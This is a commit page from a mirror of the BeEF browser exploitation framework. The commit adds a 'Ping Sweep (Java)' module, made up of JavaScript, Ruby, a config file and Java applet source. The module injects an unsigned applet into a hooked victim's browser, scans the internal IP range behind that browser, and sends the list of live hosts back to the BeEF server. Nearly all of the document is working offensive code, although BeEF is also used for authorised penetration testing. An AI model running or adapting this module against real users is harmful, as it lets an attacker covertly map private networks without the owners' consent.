Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added PingSweepJava module: as the PingSweep module works only on FF, this one uses an unsigned applet to do the same thing on all the other browsers :-)

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1405 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
antisnatchor
2011-11-03 15:13:18 +00:00
parent de4c668834
commit c863d70c30
5 changed files with 209 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

61
modules/network/ping_sweep_java/command.js Normal file
View File

@@ -0,0 +1,61 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var ipRange = "<%= @ipRange %>";
var timeout = "<%= @timeout %>";
var appletTimeout = 30;
var output = "";
var hostNumber = 0;
var internal_counter = 0;
var firstMsgSent = false;
beef.dom.attachApplet('pingSweep', 'pingSweep', 'pingSweep', "http://"+beef.net.host+":"+beef.net.port+"/", null, [{'ipRange':ipRange, 'timeout':timeout}]);
function waituntilok() {
try {
hostNumber = document.pingSweep.getHostsNumber();
if(hostNumber != null && hostNumber > 0){
if(!firstMsgSent){
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Applet attached.<br>Hosts to check: ' + hostNumber + '<br>Required time (s): ~' + (timeout * hostNumber)/1000);
firstMsgSent = true;
}
output = document.pingSweep.getAliveHosts();
clearTimeout(int_timeout);
clearTimeout(ext_timeout);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Alive hosts:<br>'+output.replace(/\n/g,"<br>"));
beef.dom.detachApplet('pingSweep');
return;
}else{
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=No hosts to check');
return;
}
} catch (e) {
internal_counter++;
if (internal_counter > appletTimeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ps=Timeout after '+appletTimeout+' seconds');
beef.dom.detachApplet('pingSweep');
return;
}
int_timeout = setTimeout(function() {waituntilok()},1000);
}
}
ext_timeout = setTimeout(function() {waituntilok()},5000);
});

27
modules/network/ping_sweep_java/config.yaml Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
ping_sweep_java:
enable: true
category: "Network"
name: "Ping Sweep (Java)"
description: "Discover active hosts in the internal network of the hooked browser. Same logic of the Ping Sweep module, but using an unsigned Java applet to work in browsers other than Firefox.<br> For Firefox, use the normal PingSweep module."
authors: ["antisnatchor"]
target:
working: ["S", "O", "IE"]
user_notify: ["C"]
not_working: ["FF"]

44
modules/network/ping_sweep_java/module.rb Normal file
View File

@@ -0,0 +1,44 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Ping Sweep Module - jgaliana
# Discover active hosts in the internal network of the hooked browser.
# It works calling a Java method from JavaScript and do not require user interaction.
class Ping_sweep_java < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/ping_sweep_java/pingSweep.class','/pingSweep','class')
end
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class or IP)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'timeout', 'ui_label' => 'Timeout (ms)', 'value' => '2000'}
]
end
def post_execute
content = {}
content['ps'] =@datastore['ps'] if not @datastore['ps'].nil?
if content.empty?
content['fail'] = 'No active hosts have been discovered.'
end
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/pingSweep.class')
save content
end
end

BIN
modules/network/ping_sweep_java/pingSweep.class Normal file
View File

Binary file not shown.

77
modules/network/ping_sweep_java/pingSweep.java Normal file
View File

@@ -0,0 +1,77 @@
import java.applet.Applet;
import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;
/*
* Coded by Michele "antisnatchor" Orru' for the BeEF project.
* Given a single IP or IP range, check without hosts are alive (ping sweep).
*/
public class pingSweep extends Applet {
public static String ipRange = "";
public static int timeout = 0;
public static List<InetAddress> hostList;
public pingSweep() {
super();
return;
}
public void init(){
ipRange = getParameter("ipRange");
timeout = Integer.parseInt(getParameter("timeout"));
}
//called from JS
public static int getHostsNumber(){
try{
hostList = parseIpRange(ipRange);
}catch(UnknownHostException e){ //do something
}
return hostList.size();
}
//called from JS
public static String getAliveHosts(){
String result = "";
try{
result = checkHosts(hostList);
}catch(IOException io){
//do something
}
return result;
}
private static List<InetAddress> parseIpRange(String ipRange) throws UnknownHostException {
List<InetAddress> addresses = new ArrayList<InetAddress>();
if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250
String[] ips = ipRange.split("-");
String[] octets = ips[0].split("\\.");
int lowerBound = Integer.parseInt(octets[3]);
int upperBound = Integer.parseInt(ips[1].split("\\.")[3]);
for (int i = lowerBound; i <= upperBound; i++) {
String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i;
addresses.add(InetAddress.getByName(ip));
}
} else { //single ip: ipRange = 172.31.229.240
addresses.add(InetAddress.getByName(ipRange));
}
return addresses;
}
private static String checkHosts(List<InetAddress> inetAddresses) throws IOException {
String alive = "";
for (InetAddress inetAddress : inetAddresses) {
if (inetAddress.isReachable(timeout)) {
alive += inetAddress.toString() + "\n";
}
}
return alive;
}
}